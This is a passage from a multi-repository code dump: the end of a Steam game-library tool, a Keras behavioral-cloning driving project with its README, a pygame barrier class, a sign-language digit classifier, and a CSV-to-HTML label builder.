{}\ndbs.append(apidata)\n\ndef runupdate():\n\tif not localdata:\n\t\tutils.debuglog(\"Loading Local Game Database\")\n\t\tlocals.getlocals(steamhome, logindata, gamedata, localdata)\n\n\tif options.checkdue(\"profileloaded\",60*60):\n\t\tutils.debuglog(\"Loading Online Profile\")\n\t\tonlineprofile.getprofile(logindata, gamedata)\n\n\tif not apidata:\n\t\tapidata.clear()\n\t\tutils.debuglog(\"Loading Games API\")\n\t\tapi.getapi(logindata, gamedata, apidata)\n\n\tif options.checkdue(\"reviewsloaded\",60*60*24):\n\t\tutils.debuglog(\"Loading your Reviews\")\n\t\treviews.getreviews(logindata,gamedata)\n\n\tif options.get(\"rungamemon\"):\n\t\tutils.debuglog(\"Game Monitor Scanning\")\n\t\tgamemon.checkprocs(gamedata,localdata)\n\n\tutils.debuglog(\"Saving/Done\")\n\tgamedb.save()\n\nallstop = False\nthread = utils.RunAsync(allstop, runupdate, 60)\nthread.start()\n\ndef mkdumpdb():\n\tdumpdb = {\n\t\t\"name64\": logindata[\"id64\"],\n\t \"name\": logindata[\"dir\"],\n\t\t\"user\": logindata[\"name\"]\n\t}\n\tif \"avatar\" in logindata[\"configdata\"][\"UserLocalConfigStore\"][\"friends\"][logindata[\"dir\"]]:\n\t\tdumpdb[\"avatar\"] = logindata[\"configdata\"][\"UserLocalConfigStore\"][\"friends\"][logindata[\"dir\"]][\"avatar\"]\n\tdumpdb[\"gamelist\"] = {}\n\tfor db in dbs:\n\t\tdbo = copy.deepcopy(db)\n\t\tutils.merge(dumpdb[\"gamelist\"],dbo)\n\treturn dumpdb\ndef 
handlegames(qs):\n\tdumpdb = mkdumpdb()\n\treturn 'application/json',json.dumps(dumpdb)\ndef handlecsv(qs):\n\tdumpdb = mkdumpdb()\n\tcsv = utils.jsontocsv(dumpdb[\"gamelist\"])\n\treturn 'text/csv',\"\\n\".join(csv)\ndef handleoptions(qs):\n\treturn 'application/json',json.dumps(options.get())\ndef handlesetoptions(qs):\n\tif \"name\" in qs and \"value\" in qs:\n\t\toptions.set(qs[\"name\"],qs[\"value\"]==\"true\")\n\t\toptions.save()\n\treturn \"text/html\",\"OK\"\nserverhandler = {\n\t\"/games\": handlegames,\n\t\"/csvgames\": handlecsv,\n\t\"/options\": handleoptions,\n\t\"/setopt\": handlesetoptions\n}\n\nserver.runserver(serverhandler, allstop)" } ]
17
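The pyst loader above builds `logindata["configdata"]` and the local game list by repeatedly folding dicts together with `utils.merge`. That helper's implementation is not shown in this snippet, so the following is only a sketch of the recursive-merge semantics the call sites appear to rely on:

```python
# Hypothetical sketch of a recursive dict merge with the semantics the
# utils.merge call sites above seem to assume (actual code not shown here).
def merge(base, extra):
    for key, value in extra.items():
        if isinstance(value, dict) and isinstance(base.get(key), dict):
            merge(base[key], value)  # descend into nested mappings
        else:
            base[key] = value  # non-dict values from extra win
    return base

print(merge({"a": {"x": 1}}, {"a": {"y": 2}, "b": 3}))
# -> {'a': {'x': 1, 'y': 2}, 'b': 3}
```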
chenwade/CarND-Behavioral-Cloning-P3
https://github.com/chenwade/CarND-Behavioral-Cloning-P3
cbad8e0fd04e753724cc6dcc5079738250f8e4bb
f2b762937e72ca32257d254ec89039f277f3c51a
e252cc8f3a7f8db19f9d1cba101a195e75f653c4
refs/heads/master
2020-03-22T19:29:23.086796
2018-07-11T07:54:25
2018-07-11T07:54:25
140,532,402
0
0
MIT
2018-07-11T06:37:29
2018-07-09T15:46:54
2018-06-26T23:33:21
null
[ { "alpha_fraction": 0.7289564609527588, "alphanum_fraction": 0.758078932762146, "avg_line_length": 51.885135650634766, "blob_id": "a6953123ccfbdd4dfe7a074b2eadc8631d6c6ecb", "content_id": "ef5f3e1b4a1a49a7b0a2572eb19e22b4c50bbf56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7829, "license_type": "permissive", "max_line_length": 626, "num_lines": 148, "path": "/README.md", "repo_name": "chenwade/CarND-Behavioral-Cloning-P3", "src_encoding": "UTF-8", "text": "# **Behavioral Cloning** \n\nThis project mainly focuses on mimicing humans' driving behaviors via neural network and simulating it into the Game.\n\n---\n\n**Behavioral Cloning Project**\n\nThe goals / steps of this project are the following:\n\n* Use the simulator to collect data of humans' driving behaviors. It was generated by three different cameras (left, mid, right) embedded in the font of the car.\n* Construct a neural network in keras in order to solve the regression problem, which is by training the network to predict how much of the angle the car should shift.\n* Train and validate the model with a training and validation set.\n* Test that the model successfully drives around track one without leaving the road.\n\n\n[//]: # (Image References)\n\n[image1]: ./Images/cropped_img.jpg\n[image2]: ./Images/angle_data.png\n[image3]: ./Images/angle_data_boom.png\n[image5]: ./Images/boom.png\n[image6]: ./Autonomous_Mode.gif\n\n## Rubric Points\n### Here I will consider the [rubric points](https://review.udacity.com/#!/rubrics/432/view) individually and describe how I addressed each point in my implementation. \n\n---\n### Files Submitted & Code Quality\n\n#### 1. Submission includes all required files and can be used to run the simulator in autonomous mode\n\nMy project includes the following files:\n\n* model.py containing the script to create and train the model.\n* drive.py for driving the car in autonomous mode.\n* model.hdf5 containing a trained convolution neural network.\n* writeup_report.md or writeup_report.pdf summarizing the results.\n\n#### 2. Submission includes functional code\nUsing the Udacity provided simulator and my drive.py file, the car can be driven autonomously around the track by executing\n```sh\npython drive.py model.hdf5\n```\n\n#### 3. Submission code is usable and readable\n\nThe model.py file contains the code for training and saving the best weights of my convolution neural network. The file contains comments to show how each function works. And I have all functions compacted in the model.py.\n\n### Model Architecture and Training Strategy\n\n#### 1. An appropriate model architecture has been employed\n\nI was inspired by the paper [End to End Learning for Self-Driving Cars](https://arxiv.org/abs/1604.07316) from NVIDIA. And also I have modified the activation functions into 'ReLU' instead of 'ELU'.\n\nMy model has total nine layers. The first five layers are all convolutional layers and the rest of the four are fully-connected layers. Among the convolutional layers, the first three are convolved by 5x5 filters, and the other two are convolved by 3x3 filters. The number of filters are 24, 36, 48, 64, 64 respectively (model.py lines 99-103).\n\nThe other four fully-connected layers have their sizes 100, 50, 10, 1 respectively (model.py lines 105-108).\n\nAnd the difference between my network and network in the paper is the activation functions. 
I changed activations function of all convolutional layers (model.py lines 99-103).\n\n#### 2. Attempts to reduce overfitting in the model\n\nMy model only picks the best weights after training and validation.\n\nMy weights was put into the simulator to ensure there is no overfitting in the model.\n\n#### 3. Model parameter tuning\n\nMy model uses 'Adam' optimizer and it has such properties:\n```sh\nm_0 <- 0 (Initialize initial 1st moment vector)\nv_0 <- 0 (Initialize initial 2nd moment vector)\nt <- 0 (Initialize timestep)\n```\nThe update rule for variable with gradient g:\n```sh\nt <- t + 1\nlr_t <- learning_rate * sqrt(1 - beta2^t) / (1 - beta1^t)\n\nm_t <- beta1 * m_{t-1} + (1 - beta1) * g\nv_t <- beta2 * v_{t-1} + (1 - beta2) * g * g\nvariable <- variable - lr_t * m_t / (sqrt(v_t) + epsilon)\n```\nAlso, it has defult epsilon which is 1e-08 and its value of weight_decay is 0.0.\n\n#### 4. Appropriate training data\n\nBecause there are total three cameras embedded in the front of the car, I used all of them to generate proper data for training. For example, the simulator creates a file named 'driving_log.csv' which contains all three images' names (center, left, right) captured by three different cameras and those images are contained in the folder named '/IMG'. Besides, the 'driving_log.csv' contains the steering_angle, speed, throttle, brake_flag data. In this project I only used steering_angle as training label since the speed is controlled by the throttle and brake and its value affects nothing much but the GPU processing speed.\n\n### Model Architecture and Training Strategy\n\n#### 1. Visualizing the data & modifying it\n\nBefore training the network, we have to visualize the data, for example, images from three different angles.\n\n<p align=\"middle\">\n <img src=\"./Images/left_2018_07_04_11_40_44_134.jpg\" width=\"250\"/>\n <img src=\"./Images/center_2018_07_04_11_40_44_134.jpg\" width=\"250\"/>\n <img src=\"./Images/right_2018_07_04_11_40_44_134.jpg\" width=\"250\"/>\n</p>\n\nWe can see that the left image has shifted to left a little bit compared with the center image, so we have to add a correction into steering_angle before using the left image in training. So as to the right image, we have to minus a correction into steering_angle. And in our model, we set up the correction as 0.2.\n\nMeanwhile, for each of the training image, we have to get rid of redundant information in it. For example, the image has size 320x160 and the upper part of the image consists of redundant features, like trees, sky, hills. These features may disturb our network. So we crop out 50 pixels from the upper part and 20 pixels from the lower part and hence we have our final image resized into 320x90.\n\n<p align=\"middle\">\n <img src=\"./Images/cropped_img.jpg\" width=\"400\"/>\n</p>\n\n\n\n\n#### 2. Model Architecture\n\n\nAfter having visualized the images, we then see how the steering_angle looks like.\n\n![steering_angle][image2]\n\nThe steering_angle data has distributed around zero, which means that we have collect a good driving behavior data. However, due to the shape of track, which has more left corners than right corners, negative steering_angles appear more than positive ones. So we decide to flip the images and steering_angles in order to balance both side around zero point.\n\n![steering_angle after modified][image3]\n\n#### 3. Training Process & Results\n\n\nAfter that, we shuffle the image data into two parts, training data and validation data, with the ratio 8:2.\n\n#### 2. 
Model Architecture\n\n\nThe model is a hierachical network. The network takes input image as shape 320x90x3 and normalizes it in each channel. It means that for each channel (R, G, B), all entries in 320x90 matrix should be divided by 127.5 and then subtracted by 1. It makes value of all entries in matrix range from -1 to 1.\n\nNext, normalized images convolve 24, 36, 48 filters with kernel_size 5. And the stride for the first three convolutional layers is 2, while using 'valid' padding and 'ReLU' activation function. Then, feature maps convolve 64, 64 filters with kernel_size 3, while the stride is 1, 'valid' padding and 'ReLU' activation function.\n\nAfter that, we flatten the output of the last convolutional layer, which is a 8448x1 vector and put the vector consecutively into 100, 50, 10 fully-connected layers. Last, our network takes the 10x1 vector and output a number.\n\n![Network Architecture][image5]\n\n\n#### 3. Training Process & Results\n\nAt first, we try to collect good driving behaviors by shiftting the car smoothly. Then we feed our network with cropped RGB images and let the network using the 'MSE' to back propagate the weights. We use the Adam optimizer to optimize our network and in order to keep the best weights, we set up one check pointer monitoring the validation loss. The one who has minimum validation loss is our best weights.\n\nAfter training, we save the best weights into \"model.hdf5\" and run it in autonomous mode in game.\n\n![Autonomous Mode][image6]\n\n\n" }, { "alpha_fraction": 0.6269587278366089, "alphanum_fraction": 0.6596461534500122, "avg_line_length": 45.72441101074219, "blob_id": "f9da471613df3c975e23b9f09e56cfb95d4deb0e", "content_id": "990b2154ec0c98db671c9e7a1770ea4da03db896", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5935, "license_type": "permissive", "max_line_length": 191, "num_lines": 127, "path": "/model.py", "repo_name": "chenwade/CarND-Behavioral-Cloning-P3", "src_encoding": "UTF-8", "text": "import os\nimport csv\nimport cv2\nimport numpy as np\nfrom keras import optimizers\nfrom keras.models import Sequential, Model\nfrom keras.layers import Cropping2D, Flatten, Dense, Lambda, Convolution2D, Dropout\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nfrom keras.callbacks import ModelCheckpoint\n\n\n# Initialize parameters for the whole program\ncorrection = 0.2\nlr = 0.001\nbeta_1 = 0.9\nbeta_2 = 0.999\nepsilon = None\ndecay = 0.0\nrate = 0.5\n\n\n# Open the driving_log.csv file which contains the images names captured by three different\n# camera (center, left, right).\nlines = []\nwith open('driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n\n# Split the training data and testing data with ratio 8:2\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\n\n# Define the generator as it creates batch and output them\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1:\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n measurements = []\n for line in batch_samples:\n # Get paths of three types of images (center, left, right)\n center_path = line[0]\n left_path = line[1]\n right_path = line[2]\n # Extract the filename of them\n center_filename = center_path.split('/')[-1]\n left_filename = left_path.split('/')[-1]\n right_filename = 
right_path.split('/')[-1]\n current_center_path = 'IMG/' + center_filename\n current_left_path = 'IMG/' + left_filename\n current_right_path = 'IMG/' + right_filename\n # Read all images and store them\n center_image = cv2.imread(current_center_path)\n left_image = cv2.imread(current_left_path)\n right_image = cv2.imread(current_right_path)\n # Convert BGR into RGB images\n center_image = cv2.cvtColor(center_image, cv2.COLOR_BGR2RGB)\n left_image = cv2.cvtColor(left_image, cv2.COLOR_BGR2RGB)\n right_image = cv2.cvtColor(right_image, cv2.COLOR_BGR2RGB)\n # Append them into images, first center_image, then left_image and last right_image\n images.append(center_image)\n images.append(left_image)\n images.append(right_image)\n # Append the angles into measurements, first center_angle, then left_angle and last right_angle\n center_measurement = float(line[3])\n left_measurement = center_measurement + correction\n right_measurement = center_measurement - correction\n measurements.append(center_measurement)\n measurements.append(left_measurement)\n measurements.append(right_measurement)\n # Store the flipped images and its steering_angle\n augmented_images = []\n augmented_measurements = []\n for image, measurement in zip(images, measurements):\n augmented_images.append(image)\n augmented_measurements.append(measurement)\n augmented_images.append(cv2.flip(image, 1))\n augmented_measurements.append(measurement * -1.0)\n\n # Setting X data and y data, where x data contains images from different angle, and y data contains its\n # corresponding angles.\n x = np.array(augmented_images)\n y = np.array(augmented_measurements)\n # Shuffle the data\n yield shuffle(x, y)\n\n\n# Compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\n\n# Network Architecture\nmodel = Sequential()\n# Normalizing the data into range [-1, 1].\nmodel.add(Lambda(lambda x: x / 127.5 - 1, input_shape=(160, 320, 3)))\n# Cropping the image and keep the area where we are interested.\nmodel.add(Cropping2D(cropping=((50, 20), (0, 0)), input_shape=(160, 320, 3)))\n# Input shape (90, 320, 3), output shape (43, 158, 24) Valid padding\nmodel.add(Convolution2D(filters=24, kernel_size=5, strides=2, padding='valid', activation='relu'))\n# Input shape (43, 158, 24), output shape (20, 77, 36) valid padding\nmodel.add(Convolution2D(filters=36, kernel_size=5, strides=2, padding='valid', activation='relu'))\n# Input shape (20, 77, 36), output shape (8, 37, 48) valid padding\nmodel.add(Convolution2D(filters=48, kernel_size=5, strides=2, padding='valid', activation='relu'))\n# Input shape (8, 37, 48), output shape (6, 35, 64) valid padding\nmodel.add(Convolution2D(filters=64, kernel_size=3, strides=1, padding='valid', activation='relu'))\n# Input shape (6, 35, 64), output shape (4, 33, 64) valid padding\nmodel.add(Convolution2D(filters=64, kernel_size=3, strides=1, padding='valid', activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n# Setting up the optimizer as Adam optimizer with lr = 0.001, beta_1 = 0.9, beta_2 = 0.999 and no weight_decay.\nsgd = optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon, decay=decay, amsgrad=False)\nmodel.compile(loss='mse', optimizer=sgd)\n\n# Storing the weight into file \"model.hdf5\"\nfile_path = \"model.hdf5\"\n\n# Setting up a check pointer to monitor the validation loss and pick the 
best weights among them.\ncheck_pointer = ModelCheckpoint(filepath=file_path, monitor='val_loss', verbose=1, save_best_only=True)\nmodel.fit_generator(train_generator, samples_per_epoch=len(train_samples), validation_data=validation_generator, nb_val_samples=len(validation_samples), nb_epoch=5, callbacks=[check_pointer])\n\n" } ]
2
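The generator in model.py above derives labels for the side cameras by adding or subtracting a fixed correction of 0.2, then doubles the batch by horizontal flipping. A minimal standalone sketch of just that augmentation step (the 160x320 frame shape and the 0.2 value follow the code above; the sample data here is made up):

```python
import numpy as np
import cv2

CORRECTION = 0.2  # side-camera steering offset, as in model.py

def augment(center_img, left_img, right_img, center_angle):
    # Three cameras give three labelled samples ...
    pairs = [
        (center_img, center_angle),
        (left_img, center_angle + CORRECTION),   # left camera: steer back right
        (right_img, center_angle - CORRECTION),  # right camera: steer back left
    ]
    # ... and mirroring each frame negates its steering angle.
    pairs += [(cv2.flip(img, 1), -angle) for img, angle in pairs]
    return pairs

frame = np.zeros((160, 320, 3), dtype=np.uint8)  # dummy camera frame
print([round(a, 1) for _, a in augment(frame, frame, frame, 0.1)])
# [0.1, 0.3, -0.1, -0.1, -0.3, 0.1]
```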
GabeMags/AlienGame
https://github.com/GabeMags/AlienGame
1752b05e3f7ab77f868faca386eda63f32095773
c593b8473c4430d0fe0c440f1fd67fe20eb446e1
116fbdd390add60288b774bf661567578de9c714
refs/heads/master
2020-04-24T05:22:45.342623
2019-02-20T19:32:03
2019-02-20T19:32:03
171,733,527
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6165951490402222, "alphanum_fraction": 0.6266094446182251, "avg_line_length": 28.478260040283203, "blob_id": "c0c2a22fb205a1b003414495d56e38d9544fb1ff", "content_id": "666922f7f092ab1590f58349572045e3f9da50c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 64, "num_lines": 23, "path": "/venv/barrier.py", "repo_name": "GabeMags/AlienGame", "src_encoding": "UTF-8", "text": "import pygame\r\n\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Barrier():\r\n #A class to represent a single barrier shield\r\n\r\n def __init__(self, ai_settings, screen):\r\n #Initialize the barrier and set its position in the game\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n\r\n #Load the barrier image and set its rect attribute\r\n self.image = pygame.image.load('images/barrier_1.png')\r\n self.rect = self.image.get_rect()\r\n\r\n #Place each barrier near the bottom of the screen\r\n self.rect.x = 200\r\n self.rect.y = 500\r\n\r\n def blitme(self):\r\n #blit the barrier on screen\r\n self.screen.blit(self.image, self.rect)" } ]
1
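Barrier above only loads an image and blits it at a fixed rect; a minimal event loop that would exercise it might look like this (the window size and the None ai_settings are assumptions -- Barrier stores ai_settings but never reads it, and the import path is hypothetical):

```python
import pygame
from barrier import Barrier  # the class shown above (import path assumed)

pygame.init()
screen = pygame.display.set_mode((800, 600))
barrier = Barrier(ai_settings=None, screen=screen)

running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    screen.fill((230, 230, 230))  # clear the frame
    barrier.blitme()              # draw the barrier at its rect position
    pygame.display.flip()
pygame.quit()
```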
Abdulrhman-asim/Neural-Networks
https://github.com/Abdulrhman-asim/Neural-Networks
c7241be256348af0dc99f4bb26f928e81f5f9353
2376d24f2de177e8ba73e1969e5b40f9da4f9fcf
c1ec79703d3f133e30db1d2154a75fef8e0be84e
refs/heads/master
2020-12-01T15:21:31.763129
2019-12-28T23:47:34
2019-12-28T23:47:34
230,679,385
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.527127742767334, "alphanum_fraction": 0.5660870671272278, "avg_line_length": 26.220640182495117, "blob_id": "322151a961dffec9dcc87fd725119632f7c55107", "content_id": "6b335261f27c3c8b1f75ef050d80d38af41c77e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7649, "license_type": "no_license", "max_line_length": 100, "num_lines": 281, "path": "/SignNumber_Classifier.py", "repo_name": "Abdulrhman-asim/Neural-Networks", "src_encoding": "UTF-8", "text": "import os\nimport cv2\nimport numpy as np\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Flatten, Conv2D, MaxPooling2D\n\n\ndef readData(colorType):\n datapath = 'E:/College Crap/MachineLearning/Project/Sign-Language-Digits-Dataset-master/Dataset'\n categories = 10\n data = []\n x = []\n y = []\n avgs = []\n for i in range(0, categories):\n currentNumPath = os.path.join(datapath, str(i))\n for img in os.listdir(currentNumPath):\n if colorType == 1:\n imgArray = cv2.imread(os.path.join(currentNumPath, img), cv2.IMREAD_GRAYSCALE)\n else:\n imgArray = cv2.imread(os.path.join(currentNumPath, img))\n avgs.append(imgArray.mean())\n\n imgArray = cv2.resize(imgArray, (100, 100))\n data.append([imgArray, i])\n\n random.shuffle(data)\n avgs = np.array(avgs).mean()\n\n for features, label in data:\n x.append(features)\n y.append(label)\n\n if colorType == 1:\n x = np.array(x).reshape(-1, 100, 100, 1)\n else:\n x = np.array(x).reshape(-1, 100, 100, 3)\n x = np.subtract(x, avgs)\n\n x = np.divide(x, 255)\n\n return x, y\n\ndef createNNModels(x):\n\n ###########################\n # First model\n ###########################\n\n model1 = Sequential()\n\n model1.add(Flatten(input_shape=x.shape[1:]))\n model1.add(Dense(200))\n model1.add(Activation('relu'))\n\n model1.add(Dense(128))\n model1.add(Activation('relu'))\n\n model1.add(Dense(10))\n model1.add(Activation('softmax'))\n\n model1.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Second model\n ###########################\n\n model2 = Sequential()\n\n model2.add(Flatten(input_shape=x.shape[1:]))\n model2.add(Dense(256))\n model2.add(Activation('relu'))\n\n model2.add(Dense(128))\n model2.add(Activation('relu'))\n\n model2.add(Dense(64))\n model2.add(Activation('relu'))\n\n model2.add(Dense(10))\n model2.add(Activation('softmax'))\n\n model2.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Third model\n ###########################\n\n\n model3 = Sequential()\n\n model3.add(Flatten(input_shape=x.shape[1:]))\n\n model3.add(Dense(128))\n model3.add(Activation('relu'))\n\n\n model3.add(Dense(10))\n model3.add(Activation('softmax'))\n\n model3.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Fourth model\n ###########################\n\n\n model4 = Sequential()\n\n model4.add(Flatten(input_shape=x.shape[1:]))\n\n model4.add(Dense(10))\n model4.add(Activation('softmax'))\n\n model4.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n return model1, model2, model3, model4\n\n\ndef createModels(x):\n ###########################\n # First model\n ###########################\n\n model1 = Sequential()\n\n 
model1.add(Conv2D(32, (3, 3), input_shape=x.shape[1:]))\n model1.add(Activation('relu'))\n model1.add(MaxPooling2D(pool_size=(2, 2)))\n\n model1.add(Conv2D(32, (3, 3)))\n model1.add(Activation('relu'))\n model1.add(MaxPooling2D(pool_size=(2, 2)))\n\n model1.add(Flatten())\n model1.add(Dense(32))\n\n model1.add(Dense(10))\n model1.add(Activation('softmax'))\n\n model1.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\n\n ###########################\n # Second model\n ###########################\n\n model2 = Sequential()\n\n model2.add(Conv2D(64, (4, 4), input_shape=x.shape[1:]))\n model2.add(MaxPooling2D(pool_size=(2, 2)))\n model2.add(Activation('elu'))\n\n model2.add(Conv2D(64, (4, 4)))\n model2.add(MaxPooling2D(pool_size=(2, 2)))\n model2.add(Activation('elu'))\n\n model2.add(Conv2D(64, (4, 4)))\n model2.add(MaxPooling2D(pool_size=(2, 2)))\n model2.add(Activation('elu'))\n\n model2.add(Flatten())\n model2.add(Dense(64))\n\n model2.add(Dense(10))\n model2.add(Activation('softmax'))\n\n model2.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Third model\n ###########################\n\n model3 = Sequential()\n\n model3.add(Conv2D(50, (4, 4), input_shape=x.shape[1:]))\n model3.add(MaxPooling2D(pool_size=(3, 3)))\n model3.add(Activation('elu'))\n\n model3.add(Conv2D(50, (3, 3)))\n model3.add(MaxPooling2D(pool_size=(2, 2)))\n model3.add(Activation('relu'))\n\n model3.add(Flatten())\n model3.add(Dense(64))\n\n model3.add(Dense(10))\n model3.add(Activation('softmax'))\n\n model3.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n ###########################\n # Fourth model\n ###########################\n\n model4 = Sequential()\n\n model4.add(Conv2D(64, (4, 4), input_shape=x.shape[1:]))\n model4.add(MaxPooling2D(pool_size=(3, 3)))\n model4.add(Activation('relu'))\n\n model4.add(Conv2D(64, (3, 3)))\n model4.add(Activation('relu'))\n model4.add(MaxPooling2D(pool_size=(2, 2)))\n\n model4.add(Conv2D(64, (2, 2)))\n model4.add(Activation('relu'))\n model4.add(MaxPooling2D(pool_size=(2, 2)))\n\n model4.add(Flatten())\n model4.add(Dense(32))\n\n model4.add(Dense(10))\n model4.add(Activation('softmax'))\n\n model4.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n return model1, model2, model3, model4\n\n\ndef main():\n ###############################\n # Grayscale Image Testing\n ###############################\n\n # Read the data as grayscale\n x, y = readData(1)\n\n # Read the data as RGB\n x2, y2 = readData(2)\n\n\n\n # Split the data for training and testing\n X_train, X_test, Y_train, Y_test = train_test_split(x, y, train_size=0.8)\n\n X2_train, X2_test, Y2_train, Y2_test = train_test_split(x2, y2, train_size=0.8)\n\n # Create Models\n models = createNNModels(x)\n rgbModels = createModels(x2);\n print(\"Models Fitting\")\n print(\"--------------------------------------\")\n for m in range (0, len(models)):\n print(\"Grayscale Model no \" + str(m + 1) + \": \")\n\n models[m].fit(X_train, Y_train, batch_size=16, validation_split=0.2, epochs=50)\n print(\"RGB Model no \" + str(m + 1) + \": \")\n rgbModels[m].fit(X2_train, Y2_train, batch_size=16, validation_split=0.2, epochs=8)\n\n\n print(\"Models performance on grayscale images\")\n print(\"--------------------------------------\")\n\n for m in range(0, len(models)):\n print(\"Grayscale Model no \" + str(m+1) + \": \")\n\n predictions = 
models[m].predict_classes(X_test)\n        acc = accuracy_score(y_true=Y_test, y_pred=predictions)\n        print(\"Accuracy: \" + str(acc))\n        print(classification_report(Y_test, predictions))\n        print(\"========================================\")\n\n    print(\"Models performance on RGB images\")\n    print(\"--------------------------------------\")\n\n    for m in range(0, len(rgbModels)):\n        print(\"RGB Model no \" + str(m + 1) + \": \")\n        predictions = rgbModels[m].predict_classes(X2_test)\n        acc = accuracy_score(y_true=Y2_test, y_pred=predictions)\n        print(\"Accuracy: \" + str(acc))\n        print(classification_report(Y2_test, predictions))\n        print(\"========================================\")\n\n\nif __name__ == \"__main__\":\n    main()\n" }, { "alpha_fraction": 0.8114285469055176, "alphanum_fraction": 0.8114285469055176, "avg_line_length": 48.85714340209961, "blob_id": "58d53cdb81b76b936d84da22fd804c26cd7654bb", "content_id": "bdc6d0087997c5735833bee1ec09d94b22417c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 352, "license_type": "no_license", "max_line_length": 108, "num_lines": 7, "path": "/README.md", "repo_name": "Abdulrhman-asim/Neural-Networks", "src_encoding": "UTF-8", "text": "# Neural-Networks\nExperimenting with the Keras framework and Neural Networks.\n\nThe dataset is from Turkey Ankara Ayranci Anadolu High School's Sign Language Digits.\nLink to dataset: https://github.com/ardamavi/Sign-Language-Digits-Dataset\n\nThe program serves to observe the effect of different NN architectures on the accuracy of the predictions made.\n\n" } ]
2
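readData above centers the images with a global mean and scales by 255 before reshaping for Keras; the same preprocessing in isolation looks like this (random arrays stand in for the sign-language images, and a single global mean is used, matching the averaged per-image means in the script):

```python
import numpy as np

def preprocess(images, channels=1):
    # images: iterable of 100x100 (grayscale) or 100x100x3 (RGB) arrays
    x = np.array(images, dtype=np.float64)
    x -= x.mean()   # zero-center with one global mean, as readData does
    x /= 255.0      # scale to a small zero-centered range
    return x.reshape(-1, 100, 100, channels)

batch = [np.random.randint(0, 256, (100, 100)) for _ in range(4)]
print(preprocess(batch).shape)  # (4, 100, 100, 1)
```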
samuelcolvin/csv-labels
https://github.com/samuelcolvin/csv-labels
0c181fa82df2ec2e778352c155117708bc7d81bc
a575a3f41f231c0c4f4759f6e8bf576886a43249
12075326a2e623669a779a7f0a0f8cde5be5b767
refs/heads/master
2023-08-31T07:05:51.113337
2019-04-12T13:08:48
2019-04-12T13:08:48
174,330,793
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5217865109443665, "alphanum_fraction": 0.5348584055900574, "avg_line_length": 17.73469352722168, "blob_id": "1636f4f21b184124572285b67bca320d48249810", "content_id": "65c2246fb277bb9c36e586d4e320798f58a6364b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 918, "license_type": "no_license", "max_line_length": 97, "num_lines": 49, "path": "/times/build.py", "repo_name": "samuelcolvin/csv-labels", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom csv import DictReader\nfrom pathlib import Path\n\nTHIS_DIR = Path(__file__).parent\np = THIS_DIR / 'input.csv'\n\n\nentries = []\nwith p.open(newline='') as f:\n reader = DictReader(f)\n for row in reader:\n cls = row.pop('Class')\n number = row.pop('Number')\n name = row['Team Name']\n info = '\\n'.join(f'<div class=\"info\"><b>{k}:</b> {v}</div>' for k, v in row.items() if v)\n entries.append(\n f\"\"\"\\\n <div class=\"entry\">\n <h2>Class {cls}, No. {number} - {name}</h2>\n {info}\n </div>\"\"\"\n )\n\nstyles = \"\"\"\\\n<style>\n html, body {\n margin: 0;\n padding: 0;\n }\n h2 {\n margin-bottom: 5px;\n }\n .entry {\n box-sizing: border-box;\n margin: 0 auto 20px;\n page-break-inside: avoid;\n }\n . info {\n margin-bottom: 10px;\n }\n</style>\n\"\"\"\nall = '\\n'.join(entries)\nPath('out/output.html').write_text(f\"\"\"\\\n{styles}\n{all}\n\"\"\"\n)\n" }, { "alpha_fraction": 0.5341529846191406, "alphanum_fraction": 0.556693971157074, "avg_line_length": 18.01298713684082, "blob_id": "0d465da824f1d4a06c8657755699ee715dac859e", "content_id": "6d43ca86156d6f91f3d6784e02cac3cc33209757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1464, "license_type": "no_license", "max_line_length": 74, "num_lines": 77, "path": "/build.py", "repo_name": "samuelcolvin/csv-labels", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom csv import DictReader\nfrom pathlib import Path\n\n\ndef chunk(l, n):\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\np = Path('input.csv')\n\naddresses = []\nwith p.open(newline='') as f:\n reader = DictReader(f)\n for row in reader:\n address = {k.lower().replace(' ', '_'): v 